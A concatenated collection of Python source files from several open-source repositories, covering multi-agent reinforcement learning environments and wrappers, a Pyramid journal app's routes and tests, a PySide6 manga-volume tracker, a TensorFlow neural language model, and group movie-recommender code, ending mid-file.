["magent/combined_arms_v6", combined_arms_v6, dict(map_size=16)],
["magent/tiger_deer_v4", tiger_deer_v4, dict(map_size=15)],
["mpe/simple_adversary_v2", simple_adversary_v2, dict(N=4)],
["mpe/simple_reference_v2", simple_reference_v2, dict(local_ratio=0.2)],
["mpe/simple_spread_v2", simple_spread_v2, dict(N=5)],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=5, num_adversaries=10, num_obstacles=4),
],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=1, num_adversaries=1, num_obstacles=1),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(num_good=5, num_adversaries=10, num_obstacles=4, num_food=3),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(num_good=1, num_adversaries=1, num_obstacles=1, num_food=1),
],
[
"mpe/simple_adversary_v2",
simple_adversary_v2,
dict(N=4, continuous_actions=True),
],
[
"mpe/simple_reference_v2",
simple_reference_v2,
dict(local_ratio=0.2, continuous_actions=True),
],
["mpe/simple_spread_v2", simple_spread_v2, dict(N=5, continuous_actions=True)],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=5, num_adversaries=10, num_obstacles=4, continuous_actions=True),
],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=1, num_adversaries=1, num_obstacles=1, continuous_actions=True),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(
num_good=5,
num_adversaries=10,
num_obstacles=4,
num_food=3,
continuous_actions=True,
),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(
num_good=1,
num_adversaries=1,
num_obstacles=1,
num_food=1,
continuous_actions=True,
),
],
["sisl/multiwalker_v9", multiwalker_v9, dict(n_walkers=10)],
["sisl/multiwalker_v9", multiwalker_v9, dict(shared_reward=False)],
["sisl/multiwalker_v9", multiwalker_v9, dict(terminate_on_fall=False)],
[
"sisl/multiwalker_v8",
multiwalker_v9,
dict(terminate_on_fall=False, remove_on_fall=False),
],
["sisl/pursuit_v4", pursuit_v4, dict(x_size=8, y_size=19)],
["sisl/pursuit_v4", pursuit_v4, dict(shared_reward=True)],
["sisl/pursuit_v4", pursuit_v4, dict(n_evaders=5, n_pursuers=16)],
["sisl/pursuit_v4", pursuit_v4, dict(obs_range=15)],
["sisl/pursuit_v4", pursuit_v4, dict(n_catch=3)],
["sisl/pursuit_v4", pursuit_v4, dict(freeze_evaders=True)],
["sisl/waterworld_v3", waterworld_v3, dict(n_pursuers=3, n_evaders=6)],
["sisl/waterworld_v3", waterworld_v3, dict(n_coop=1)],
["sisl/waterworld_v3", waterworld_v3, dict(n_coop=1)],
["sisl/waterworld_v3", waterworld_v3, dict(n_poison=4)],
["sisl/waterworld_v3", waterworld_v3, dict(n_sensors=4)],
["sisl/waterworld_v3", waterworld_v3, dict(local_ratio=0.5)],
["sisl/waterworld_v3", waterworld_v3, dict(speed_features=False)],
]
@pytest.mark.parametrize(["name", "env_module", "kwargs"], parameterized_envs)
def test_module(name, env_module, kwargs):
_env = env_module.env(**kwargs)
api_test(_env)
# some atari environments fail this test
if "atari/" not in name:
seed_test(lambda: env_module.env(**kwargs), 50)
render_test(lambda: env_module.env(**kwargs))
if hasattr(env_module, "parallel_env"):
par_env = env_module.parallel_env(**kwargs)
try:
_env.state()
state_test(_env, par_env)
except NotImplementedError:
# no issue if state is simply not implemented
pass
```
#### File: PettingZoo/tutorials/rllib_pistonball.py
```python
import supersuit as ss
import torch
from ray import shutdown, tune
from ray.rllib.env.wrappers.pettingzoo_env import ParallelPettingZooEnv
from ray.rllib.models import ModelCatalog
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.tune.registry import register_env
from torch import nn
from pettingzoo.butterfly import pistonball_v6
class CNNModelV2(TorchModelV2, nn.Module):
def __init__(self, obs_space, act_space, num_outputs, *args, **kwargs):
TorchModelV2.__init__(self, obs_space, act_space, num_outputs, *args, **kwargs)
nn.Module.__init__(self)
self.model = nn.Sequential(
nn.Conv2d(3, 32, [8, 8], stride=(4, 4)),
nn.ReLU(),
nn.Conv2d(32, 64, [4, 4], stride=(2, 2)),
nn.ReLU(),
nn.Conv2d(64, 64, [3, 3], stride=(1, 1)),
nn.ReLU(),
nn.Flatten(),
(nn.Linear(3136, 512)),
nn.ReLU(),
)
self.policy_fn = nn.Linear(512, num_outputs)
self.value_fn = nn.Linear(512, 1)
def forward(self, input_dict, state, seq_lens):
model_out = self.model(input_dict["obs"].permute(0, 3, 1, 2))
self._value_out = self.value_fn(model_out)
return self.policy_fn(model_out), state
def value_function(self):
return self._value_out.flatten()
def env_creator(args):
env = pistonball_v6.parallel_env(
n_pistons=20,
time_penalty=-0.1,
continuous=True,
random_drop=True,
random_rotate=True,
ball_mass=0.75,
ball_friction=0.3,
ball_elasticity=1.5,
max_cycles=125,
)
env = ss.color_reduction_v0(env, mode="B")
env = ss.dtype_v0(env, "float32")
env = ss.resize_v0(env, x_size=84, y_size=84)
env = ss.frame_stack_v1(env, 3)
env = ss.normalize_obs_v0(env, env_min=0, env_max=1)
return env
if __name__ == "__main__":
shutdown()
env_name = "pistonball_v6"
register_env(env_name, lambda config: ParallelPettingZooEnv(env_creator(config)))
test_env = ParallelPettingZooEnv(env_creator({}))
obs_space = test_env.observation_space
act_space = test_env.action_space
ModelCatalog.register_custom_model("CNNModelV2", CNNModelV2)
def gen_policy(i):
config = {
"model": {
"custom_model": "CNNModelV2",
},
"gamma": 0.99,
}
return (None, obs_space, act_space, config)
policies = {"policy_0": gen_policy(0)}
policy_ids = list(policies.keys())
tune.run(
"PPO",
name="PPO",
stop={"timesteps_total": 5000000},
checkpoint_freq=10,
local_dir="~/ray_results/" + env_name,
config={
# Environment specific
"env": env_name,
# General
"log_level": "ERROR",
"framework": "torch",
"num_gpus": 1,
"num_workers": 4,
"num_envs_per_worker": 1,
"compress_observations": False,
"batch_mode": "truncate_episodes",
# 'use_critic': True,
"use_gae": True,
"lambda": 0.9,
"gamma": 0.99,
# "kl_coeff": 0.001,
# "kl_target": 1000.,
"clip_param": 0.4,
"grad_clip": None,
"entropy_coeff": 0.1,
"vf_loss_coeff": 0.25,
"sgd_minibatch_size": 64,
"num_sgd_iter": 10, # epoc
"rollout_fragment_length": 512,
"train_batch_size": 512,
"lr": 2e-05,
"clip_actions": True,
# Method specific
"multiagent": {
"policies": policies,
"policy_mapping_fn": (lambda agent_id: policy_ids[0]),
},
},
)
``` |
{
"source": "jjshoots/rl-baselines3-zoo",
"score": 2
} |
#### File: jjshoots/rl-baselines3-zoo/eval_hyperparameters.py
```python
import sys
import json
from stable_baselines3 import PPO
import pettingzoo.butterfly.pistonball_v6 as pistonball_v5
import supersuit as ss
from stable_baselines3.common.vec_env import VecMonitor, VecTransposeImage, VecNormalize
from stable_baselines3.common.evaluation import evaluate_policy
from stable_baselines3.common.callbacks import EvalCallback
from stable_baselines3.common.preprocessing import (
is_image_space,
is_image_space_channels_first,
)
num = sys.argv[1]
n_evaluations = 20
n_agents = 20
n_envs = 4
n_timesteps = 2000000
with open("./hyperparameter_jsons/" + "hyperparameters_" + num + ".json") as f:
params = json.load(f)
print(params)
def image_transpose(env):
if is_image_space(env.observation_space) and not is_image_space_channels_first(
env.observation_space
):
env = VecTransposeImage(env)
return env
env = pistonball_v5.parallel_env()
env = ss.color_reduction_v0(env, mode="B")
env = ss.resize_v0(env, x_size=84, y_size=84)
env = ss.frame_stack_v1(env, 3)
env = ss.pettingzoo_env_to_vec_env_v1(env)
env = ss.concat_vec_envs_v1(env, n_envs, num_cpus=1, base_class="stable_baselines3")
env = VecMonitor(env)
env = image_transpose(env)
eval_env = pistonball_v5.parallel_env()
eval_env = ss.color_reduction_v0(eval_env, mode="B")
eval_env = ss.resize_v0(eval_env, x_size=84, y_size=84)
eval_env = ss.frame_stack_v1(eval_env, 3)
eval_env = ss.pettingzoo_env_to_vec_env_v1(eval_env)
eval_env = ss.concat_vec_envs_v1(
eval_env, 1, num_cpus=1, base_class="stable_baselines3"
)
eval_env = VecMonitor(eval_env)
eval_env = image_transpose(eval_env)
eval_freq = int(n_timesteps / n_evaluations)
eval_freq = max(eval_freq // (n_envs * n_agents), 1)
all_mean_rewards = []
for i in range(10):
try:
model = PPO("CnnPolicy", env, verbose=1, **params)
eval_callback = EvalCallback(
eval_env,
best_model_save_path="./eval_logs/" + num + "/" + str(i) + "/",
log_path="./eval_logs/" + num + "/" + str(i) + "/",
eval_freq=eval_freq,
deterministic=True,
render=False,
)
model.learn(total_timesteps=n_timesteps, callback=eval_callback)
model = PPO.load("./eval_logs/" + num + "/" + str(i) + "/" + "best_model")
mean_reward, std_reward = evaluate_policy(
model, eval_env, deterministic=True, n_eval_episodes=25
)
print(mean_reward)
print(std_reward)
all_mean_rewards.append(mean_reward)
if mean_reward > 90:
model.save(
"./mature_policies/"
+ str(num)
+ "/"
+ str(i)
+ "_"
+ str(mean_reward).split(".")[0]
+ ".zip"
)
except:
print("Error occurred during evaluation")
if len(all_mean_rewards) > 0:
print(sum(all_mean_rewards) / len(all_mean_rewards))
else:
print("No mature policies found")
``` |
{
"source": "jjshoots/SuperSuit",
"score": 2
} |
#### File: supersuit/generic_wrappers/max_observation.py
```python
from .utils.base_modifier import BaseModifier
from .utils.shared_wrapper_util import shared_wrapper
from supersuit.utils.accumulator import Accumulator
import numpy as np
def max_observation_v0(env, memory):
int(memory) # delay must be an int
class MaxObsModifier(BaseModifier):
def reset(self, seed=None, return_info=False, options=None):
self.accumulator = Accumulator(self.observation_space, memory, np.maximum)
def modify_obs(self, obs):
self.accumulator.add(obs)
return super().modify_obs(self.accumulator.get())
return shared_wrapper(env, MaxObsModifier)
```
#### File: supersuit/multiagent_wrappers/black_death.py
```python
from pettingzoo.utils.wrappers import BaseParallelWraper
import numpy as np
import gym
from supersuit.utils.wrapper_chooser import WrapperChooser
class black_death_par(BaseParallelWraper):
def __init__(self, env):
super().__init__(env)
def _check_valid_for_black_death(self):
for agent in self.agents:
space = self.observation_space(agent)
assert isinstance(
space, gym.spaces.Box
), f"observation sapces for black death must be Box spaces, is {space}"
def reset(self, seed=None, return_info=False, options=None):
if not return_info:
obss = self.env.reset(seed=seed, options=options)
else:
obss, infos = self.env.reset(
seed=seed, return_info=return_info, options=options
)
self.agents = self.env.agents[:]
self._check_valid_for_black_death()
black_obs = {
agent: np.zeros_like(self.observation_space(agent).low)
for agent in self.agents
if agent not in obss
}
if not return_info:
return {**obss, **black_obs}
else:
black_infos = {agent: {} for agent in self.agents if agent not in obss}
return {**obss, **black_obs}, {**black_infos, **infos}
def step(self, actions):
active_actions = {agent: actions[agent] for agent in self.env.agents}
obss, rews, dones, infos = self.env.step(active_actions)
black_obs = {
agent: np.zeros_like(self.observation_space(agent).low)
for agent in self.agents
if agent not in obss
}
black_rews = {agent: 0.0 for agent in self.agents if agent not in obss}
black_infos = {agent: {} for agent in self.agents if agent not in obss}
env_is_done = all(dones.values())
total_obs = {**black_obs, **obss}
total_rews = {**black_rews, **rews}
total_infos = {**black_infos, **infos}
total_dones = {agent: env_is_done for agent in self.agents}
if env_is_done:
self.agents.clear()
return total_obs, total_rews, total_dones, total_infos
black_death_v3 = WrapperChooser(parallel_wrapper=black_death_par)
``` |
{
"source": "jjskim/pyramid-journal",
"score": 2
} |
#### File: pyramid-journal/pyramid_journal/routes.py
```python
def includeme(config):
"""Include the following routes for static files and uri paths."""
config.add_static_view('static', 'static', cache_max_age=3600)
config.add_route('home', '/')
# config.add_route('detail', '/journal/{id:\d+}') this is regex
config.add_route('detail', '/journal/1')
config.add_route('new', '/journal/new-entry')
# config.add_route('detail', '/journal/{id:\d+}/edit-entry')
config.add_route('edit', '/journal/1/edit-entry')
```
#### File: pyramid-journal/pyramid_journal/tests.py
```python
from __future__ import unicode_literals
from pyramid import testing
import pytest
@pytest.fixture
def dummy_request():
"""Fixture to return a single dummy request."""
return testing.DummyRequest()
def test_list_view_response_status_code_200(dummy_request):
"""Test that requesting list_view returns a 200 response."""
from pyramid_journal.views.default import list_view
response = list_view(dummy_request)
assert response.status_code == 200
def test_detail_view_response_status_code_200(dummy_request):
"""Test that requesting detail_view returns a 200 response."""
from pyramid_journal.views.default import detail_view
response = detail_view(dummy_request)
assert response.status_code == 200
def test_update_view_response_status_code_200(dummy_request):
"""Test that requesting update_view returns a 200 response."""
from pyramid_journal.views.default import update_view
response = update_view(dummy_request)
assert response.status_code == 200
def test_create_view_response_status_code_200(dummy_request):
"""Test that requesting create_view returns a 200 response."""
from pyramid_journal.views.default import create_view
response = create_view(dummy_request)
assert response.status_code == 200
def test_list_view_text_response_is_content_type_html(dummy_request):
"""Test that list_view returns proper content within text."""
from pyramid_journal.views.default import list_view
response = list_view(dummy_request)
assert response.content_type == "text/html"
def test_list_view_text_response_has_proper_content(dummy_request):
"""Test that list_view returns proper content within text."""
from pyramid_journal.views.default import list_view
response = list_view(dummy_request)
the_tag = '<div class="entry_summary">'
assert the_tag in response.ubody
def test_detail_view_text_response_has_proper_content(dummy_request):
"""Test that detail_view returns proper content within text."""
from pyramid_journal.views.default import detail_view
response = detail_view(dummy_request)
the_tag = '<a href="/journal/1/edit-entry">Edit</a>'
assert the_tag in response.ubody
def test_edit_view_text_response_has_proper_content(dummy_request):
"""Test that edit_view returns proper content within text."""
from pyramid_journal.views.default import update_view
response = update_view(dummy_request)
the_tag = '<button type="submit">Edit Post</button>'
assert the_tag in response.ubody
def test_create_view_text_response_has_proper_content(dummy_request):
"""Test that create_view returns proper content within text."""
from pyramid_journal.views.default import create_view
response = create_view(dummy_request)
the_tag = '<button type="submit">Create New</button>'
assert the_tag in response.ubody
``` |
{
"source": "jjsmall009/manga-volume-tracker",
"score": 2
} |
#### File: manga-volume-tracker/mangecko/app.py
```python
from PySide6.QtWidgets import QApplication
from .controllers.controller import MainWindow
from .models import database_manager
def main():
app = QApplication([])
# Initialize our database and setup our connection
database_manager.initialize()
window = MainWindow()
window.show()
app.exec()
```
#### File: mangecko/controllers/add_library_controller.py
```python
from PySide6.QtWidgets import QDialog, QFileDialog, QMessageBox, QTableWidgetItem
from PySide6.QtCore import QObject, QThread, Signal
from pathlib import Path
from ..models.manga_model import Manga
from ..models import database_manager
from ..utilities.manga_scraper import series_scraper, series_search
from ..utilities.library_scanner import LibraryScanner
from ..views.ui_add_library_dialog import Ui_AddLibraryDialog
class LibraryAdder(QObject):
counter = Signal(int)
current_series = Signal(Manga)
exists = Signal()
finished = Signal()
def __init__(self, path, valid):
super().__init__()
self.library_path = path
self.valid_series = valid
def add_library(self):
"""
A library is just a collection of series that are related to one another
(Completed, Ongoing, Favorites, Raw, etc.)
A library in the database stores info about all matching series in the folder,
even ones that don't have a MangaUpdates match.
"""
manga = []
if not database_manager.insert_library(self.library_path.name, str(self.library_path)):
self.exists.emit()
print("I have emitted failure")
return
# For each valid folder, create a Manga object and then get some precious data
for count, (series, vol_count) in enumerate(self.valid_series.items()):
current_manga = Manga(series, vol_count)
id = series_search(series)
if id != None:
current_manga.site_id = id
current_manga.has_match = True
series_scraper(id, current_manga)
manga.append(current_manga)
self.counter.emit(count + 1)
self.current_series.emit(current_manga)
database_manager.insert_manga(manga, self.library_path.name)
self.finished.emit()
class AddLibraryDialog(QDialog, Ui_AddLibraryDialog):
def __init__(self, parent=None):
super().__init__()
self.setupUi(self)
self.done_btn.setEnabled(False)
self.count = 0
self.thread = QThread(parent=self)
self.series_table.setColumnWidth(0,400)
# Create our signals and slots
self.open_btn.clicked.connect(self.open_file)
self.add_library_btn.clicked.connect(self.setup_library)
self.done_btn.clicked.connect(self.terminate)
self.cancel_btn.clicked.connect(self.terminate)
self.name = ""
def get_name(self):
return self.name
def open_file(self):
fname = QFileDialog.getExistingDirectory(self, 'c:\\')
self.path_field.setText(fname)
self.add_library_btn.setEnabled(True)
def setup_library(self):
self.path = Path(self.path_field.text())
if not Path(self.path).exists():
QMessageBox.about(self, "Not valid path", "Not a valid path")
return
scanner = LibraryScanner(self.path)
scanner.scan_directory()
self.valid_series = scanner.valid_folders
if len(scanner.valid_folders) == 0:
QMessageBox.about(self, "No folders", "No folders founds. Not a valid library.")
return
# Thread it up
self.adder = LibraryAdder(self.path, self.valid_series)
self.adder.moveToThread(self.thread)
self.thread.started.connect(self.adder.add_library)
self.adder.counter.connect(self.update_progress)
self.adder.current_series.connect(self.update_list)
self.adder.exists.connect(self.library_exists)
self.adder.finished.connect(self.cleanup)
self.thread.start()
self.name = self.path.name
def cleanup(self):
self.done_btn.setEnabled(True)
self.adder.finished.connect(self.thread.quit)
self.adder.finished.connect(self.adder.deleteLater)
self.thread.finished.connect(self.thread.deleteLater)
def terminate(self):
if self.thread.isRunning():
self.thread.quit()
self.close()
def library_exists(self):
QMessageBox.about(self, "Library exists", "Library already exists")
def update_list(self, series):
self.series_table.insertRow(self.count)
self.series_table.setItem(self.count, 0, QTableWidgetItem(series.local_title))
self.series_table.setItem(self.count, 1, QTableWidgetItem(str(series.site_id)))
self.series_table.setItem(self.count, 2, QTableWidgetItem(str(series.my_volumes)))
self.series_table.setItem(self.count, 3, QTableWidgetItem(str(series.eng_volumes)))
self.series_table.setItem(self.count, 4, QTableWidgetItem(str(series.source_volumes)))
self.count += 1
def update_progress(self, count):
progressPercent = int(count / len(self.valid_series) * 100)
self.progressBar.setValue(progressPercent)
```
#### File: mangecko/controllers/controller.py
```python
from PySide6.QtGui import QPixmap, QIcon
from PySide6.QtCore import QSize
from PySide6.QtWidgets import QListWidgetItem, QWidget
from .new_volume_controller import NewVolumeDialog
from .scan_library_controller import ScanDialog
from .update_controller import UpdateDialog
from .add_library_controller import AddLibraryDialog
from ..models import database_manager
from ..views.ui_main_layout import Ui_main_window
from ..views.ui_card_widget import Ui_CardWidget
from ..views.ui_flow_layout import FlowLayout
class CardWidget(QWidget, Ui_CardWidget):
def __init__(self):
super().__init__()
# Initialize and set up various things
self.setupUi(self)
class MainWindow(QWidget, Ui_main_window):
def __init__(self):
super().__init__()
self.setupUi(self)
self.add_icons()
self.setup_flow_layout()
self.connect_slots()
# If there are no libraries yet, disable the buttons to make it not error out
self.populate_library_list()
if self.libraries_list_widget.count() > 0:
self.libraries_list_widget.setCurrentRow(0)
else:
self.scan_library_btn.setEnabled(False)
self.update_library_btn.setEnabled(False)
self.new_volumes_btn.setEnabled(False)
self.libraries_list_widget.model().rowsInserted.connect(self.new_library)
def add_icons(self):
"""
Qt Designer adds in the wrong path so here you go.
"""
icon1 = QIcon()
icon1.addFile("resources/icons/add-128.png", QSize(), QIcon.Normal, QIcon.Off)
self.add_library_btn.setIcon(icon1)
icon2 = QIcon()
icon2.addFile("resources/icons/settings-4-128.png", QSize(), QIcon.Normal, QIcon.Off)
self.settings_btn.setIcon(icon2)
def setup_flow_layout(self):
self.series_layout = FlowLayout()
self.series_layout.setSpacing(12)
self.series_wrapper_layout_useless.addLayout(self.series_layout)
def connect_slots(self):
# Connect slots to signals
self.libraries_list_widget.currentRowChanged.connect(self.populate_series_grid)
self.add_library_btn.clicked.connect(self.add_library)
self.settings_btn.clicked.connect(self.show_settings)
self.scan_library_btn.clicked.connect(self.scan_library)
self.update_library_btn.clicked.connect(self.update_library)
self.new_volumes_btn.clicked.connect(self.view_new_volumes)
def populate_library_list(self):
self.libraries_list_widget.clear()
list = database_manager.get_libraries()
if list is None:
return
for library in list:
self.libraries_list_widget.addItem(QListWidgetItem(library[1]))
def populate_series_grid(self):
self.deleteItemsOfLayout(self.series_layout)
print("updating series grid...")
self.series_scroll_area.verticalScrollBar().setValue(0)
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
series_list = database_manager.get_series_from_library(library_id)
self.current_library_label.setText(f"{library_name} | {len(series_list)}")
for series in series_list:
card = CardWidget()
cover = QPixmap(f"data/covers/{series[2]}.jpg")
if cover.isNull():
cover = QPixmap("data/covers/no-image.png")
card.cover_label.setPixmap(cover)
card.series_label.setText(series[0])
card.series_label.setToolTip(series[0])
card.volume_label.setText(f"Volumes - {series[1]}")
self.series_layout.addWidget(card)
def add_library(self):
print("You clicked add library")
dlg = AddLibraryDialog(self)
dlg.exec()
name = dlg.get_name()
if name != "":
self.libraries_list_widget.addItem(QListWidgetItem(name))
def new_library(self):
last_row = self.libraries_list_widget.count() - 1
self.libraries_list_widget.setCurrentRow(last_row)
self.scan_library_btn.setEnabled(True)
self.update_library_btn.setEnabled(True)
self.new_volumes_btn.setEnabled(True)
def show_settings(self):
print("You clicked settings! No settings currently...")
def scan_library(self):
print("You clicked scan library")
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
dlg = ScanDialog(library_id, self)
dlg.exec()
self.populate_series_grid()
def update_library(self):
print("You clicked update library")
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
dlg = UpdateDialog(library_id, self)
dlg.exec()
self.populate_series_grid()
def view_new_volumes(self):
print("You clicked view new volumes")
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
dlg = NewVolumeDialog(library_id, self)
dlg.exec()
def deleteItemsOfLayout(self, layout):
"""
Prevents the series grid layout from overlaying cards on top of one another
when you switch back and forth between libraries. Not the most elegant...
"""
if layout is not None:
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.setParent(None)
else:
self.deleteItemsOfLayout(item.layout())
```
#### File: mangecko/controllers/new_volume_controller.py
```python
from PySide6.QtWidgets import QCheckBox, QDialog, QLabel
from ..models import database_manager
from ..views.ui_new_volume_dialog import Ui_NewVolumeDialog
class NewVolumeDialog(QDialog, Ui_NewVolumeDialog):
def __init__(self, library_id, parent=None):
super().__init__()
self.id = library_id
# Initialize and set up various things
self.setupUi(self)
self.view_button.clicked.connect(self.display)
self.close_button.clicked.connect(self.close)
def display(self):
self.view_button.setEnabled(False)
# Display series with new volumes
series = database_manager.series_with_new_volumes(self.id)
for series in series:
text = f"{series[0]}: Volume {series[1]} -> Volume {series[2]}"
item = QCheckBox(text)
self.label_layout.addWidget(item)
``` |
{
"source": "jjsr/NNLM-2003",
"score": 3
} |
#### File: NNLM-2003/src/nnlm.py
```python
import argparse
import math
import time
import numpy as np
import tensorflow as tf
from datetime import date
from preprocessing import TextLoader
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='data/',
help='data directory containing input.txt')
parser.add_argument('--batch_size', type=int, default=120,
help='minibatch size')
parser.add_argument('--win_size', type=int, default=5,
help='context sequence length')
parser.add_argument('--hidden_num', type=int, default=100,
help='number of hidden layers')
parser.add_argument('--word_dim', type=int, default=300,
help='number of word embedding')
parser.add_argument('--num_epochs', type=int, default=3,
help='number of epochs')
parser.add_argument('--grad_clip', type=float, default=10.,
help='clip gradients at this value')
args = parser.parse_args()
args_msg = '\n'.join([ arg + ': ' + str(getattr(args, arg)) for arg in vars(args)])
data_loader = TextLoader(args.data_dir, args.batch_size, args.win_size)
args.vocab_size = data_loader.vocab_size
graph = tf.Graph()
with graph.as_default():
input_data = tf.placeholder(tf.int64, [args.batch_size, args.win_size])
targets = tf.placeholder(tf.int64, [args.batch_size, 1])
with tf.variable_scope('nnlm' + 'embedding'):
embeddings = tf.Variable(tf.random_uniform([args.vocab_size, args.word_dim], -1.0, 1.0))
embeddings = tf.nn.l2_normalize(embeddings, 1)
with tf.variable_scope('nnlm' + 'weight'):
weight_h = tf.Variable(tf.truncated_normal([args.win_size * args.word_dim, args.hidden_num],
stddev=1.0 / math.sqrt(args.hidden_num)))
softmax_w = tf.Variable(tf.truncated_normal([args.win_size * args.word_dim, args.vocab_size],
stddev=1.0 / math.sqrt(args.win_size * args.word_dim)))
softmax_u = tf.Variable(tf.truncated_normal([args.hidden_num, args.vocab_size],
stddev=1.0 / math.sqrt(args.hidden_num)))
b_1 = tf.Variable(tf.random_normal([args.hidden_num]))
b_2 = tf.Variable(tf.random_normal([args.vocab_size]))
def infer_output(input_data):
"""
hidden = tanh(x * H + b_1)
output = softmax(x * W + hidden * U + b_2)
"""
input_data_emb = tf.nn.embedding_lookup(embeddings, input_data)
input_data_emb = tf.reshape(input_data_emb, [-1, args.win_size * args.word_dim])
hidden = tf.tanh(tf.matmul(input_data_emb, weight_h)) + b_1
hidden_output = tf.matmul(hidden, softmax_u) + tf.matmul(input_data_emb, softmax_w) + b_2
output = tf.nn.softmax(hidden_output)
return output
outputs = infer_output(input_data)
one_hot_targets = tf.one_hot(tf.squeeze(targets), args.vocab_size, 1.0, 0.0)
loss = -tf.reduce_mean(tf.reduce_sum(tf.log(outputs) * one_hot_targets, 1))
# Clip grad.
optimizer = tf.train.AdagradOptimizer(0.1)
gvs = optimizer.compute_gradients(loss)
capped_gvs = [(tf.clip_by_value(grad, -args.grad_clip, args.grad_clip), var) for grad, var in gvs]
optimizer = optimizer.apply_gradients(capped_gvs)
embeddings_norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / embeddings_norm
processing_message_lst = list()
with tf.Session(graph=graph) as sess:
tf.global_variables_initializer().run()
for e in range(args.num_epochs):
data_loader.reset_batch_pointer()
for b in range(data_loader.num_batches):
start = time.time()
x, y = data_loader.next_batch()
feed = {input_data: x, targets: y}
train_loss, _ = sess.run([loss, optimizer], feed)
end = time.time()
processing_message = "{}/{} (epoch {}), train_loss = {:.3f}, time/batch = {:.3f}".format(
b, data_loader.num_batches,
e, train_loss, end - start)
print(processing_message)
processing_message_lst.append(processing_message)
# print("{}/{} (epoch {}), train_loss = {:.3f}, time/batch = {:.3f}".format(
# b, data_loader.num_batches,
# e, train_loss, end - start))
np.save('nnlm_word_embeddings.zh', normalized_embeddings.eval())
# record training processing
print(start - end)
local_time = str(time.strftime("%Y-%m-%d_%H:%M:%S", time.localtime()))
with open("{}.txt".format('casdsa'), 'w', encoding='utf-8') as f:
f.write(local_time)
f.write(args_msg)
f.write('\n'.join(processing_message_lst))
if __name__ == '__main__':
main()
```
#### File: NNLM-2003/src/preprocessing.py
```python
import os
import codecs
import collections
from six.moves import cPickle
import numpy as np
class TextLoader():
def __init__(self, data_dir, batch_size, seq_length, mini_frq=3):
self.data_dir = data_dir
self.batch_size = batch_size
self.seq_length = seq_length
self.mini_frq = mini_frq
input_file = os.path.join(data_dir, "input_iam.txt")
vocab_file = os.path.join(data_dir, "vocab_iam.txt")
self.preprocess(input_file, vocab_file)
self.create_batches()
self.reset_batch_pointer()
def build_vocab(self, sentences):
word_counts = collections.Counter()
if not isinstance(sentences, list):
sentences = [sentences]
for sent in sentences:
word_counts.update(sent)
vocabulary_inv = ['<START>', '<UNK>', '<END>'] + [x[0] for x in word_counts.most_common() if x[1] >= self.mini_frq]
vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}
return [vocabulary, vocabulary_inv]
def preprocess(self, input_file, vocab_file):
with codecs.open(input_file, 'r', 'utf-8') as f:
lines = f.readlines()
if lines[0][:1] == codecs.BOM_UTF8:
lines[0] = lines[0][1:]
lines = [line.strip().split() for line in lines]
self.vocab, self.words = self.build_vocab(lines)
self.vocab_size = len(self.words)
with open(vocab_file, 'wb') as f:
cPickle.dump(self.words, f)
raw_data = [[0] * self.seq_length + [self.vocab.get(w, 1) for w in line] + [2] * self.seq_length for line in lines]
self.raw_data = raw_data
def create_batches(self):
xdata, ydata = list(), list()
for row in self.raw_data:
for ind in range(self.seq_length, len(row)):
xdata.append(row[ind-self.seq_length:ind])
ydata.append([row[ind]])
self.num_batches = int(len(xdata) / self.batch_size)
if self.num_batches == 0:
assert False, "Not enough data. Make seq_length and batch_size small."
xdata = np.array(xdata[:self.num_batches * self.batch_size])
ydata = np.array(ydata[:self.num_batches * self.batch_size])
self.x_batches = np.split(xdata, self.num_batches, 0)
self.y_batches = np.split(ydata, self.num_batches, 0)
def next_batch(self):
x, y = self.x_batches[self.pointer], self.y_batches[self.pointer]
self.pointer += 1
return x,y
def reset_batch_pointer(self):
self.pointer = 0
``` |
{
"source": "JJSrra/Research-GroupRecommendersForMovies",
"score": 3
} |
#### File: JJSrra/Research-GroupRecommendersForMovies/baseline.py
```python
import numpy as np
import pandas as pd
def predict_group_individual_ratings_for_movie(group, movie, movie_ratings, pearson_matrix):
# Specify the K in K-nearest neighbors for each member of the group, according to Pearson
k_nearest = 10
dim = len(pearson_matrix) # Rembember that User IDs start at 1 but we need a 0 row/column, so this is 1 more
group_ratings = []
# Obtain all available users (those who are not members of the group)
available_users = [user for user in range(1,dim) if user not in group]
# For each user in the group, calculate their K-nearest neighbors and predict their rating
for group_user in group:
nearest_neighbors = obtain_nearest_neighbors(group_user, available_users, k_nearest, pearson_matrix)
group_ratings.append(predict_rating(group_user, nearest_neighbors, movie, movie_ratings, pearson_matrix[group_user]))
return group_ratings
def obtain_nearest_neighbors(user, available_neighbors, k_nearest, pearson_matrix):
return sorted(available_neighbors, key=lambda neighbor: pearson_matrix[user, neighbor], reverse=True)[:k_nearest]
def predict_rating(user, neighbors, movie, movie_ratings, user_correlation):
# Initialize these variables that will serve as an accumulation
neighbor_accumulated = 0
normalizer = 0
# For each neighbor, predict their rating to the movie based on Collaborative Filtering formula,
# and add the value to the normalizer accumulation
for neighbor in neighbors:
neighbor_rating = movie_ratings[neighbor][movie] if movie in movie_ratings[neighbor] else 0.0
neighbor_accumulated += neighbor_rating * user_correlation[neighbor]
normalizer += 0.0 if neighbor_rating == 0.0 else abs(user_correlation[neighbor])
# Predict the rating with the normalized accumulated value
if normalizer == 0.0:
return 0.0
else:
return neighbor_accumulated / normalizer
```
#### File: JJSrra/Research-GroupRecommendersForMovies/combination_strategies.py
```python
import numpy as np
from collections import Counter
def avg(ratings):
# Remove 0.0 ratings
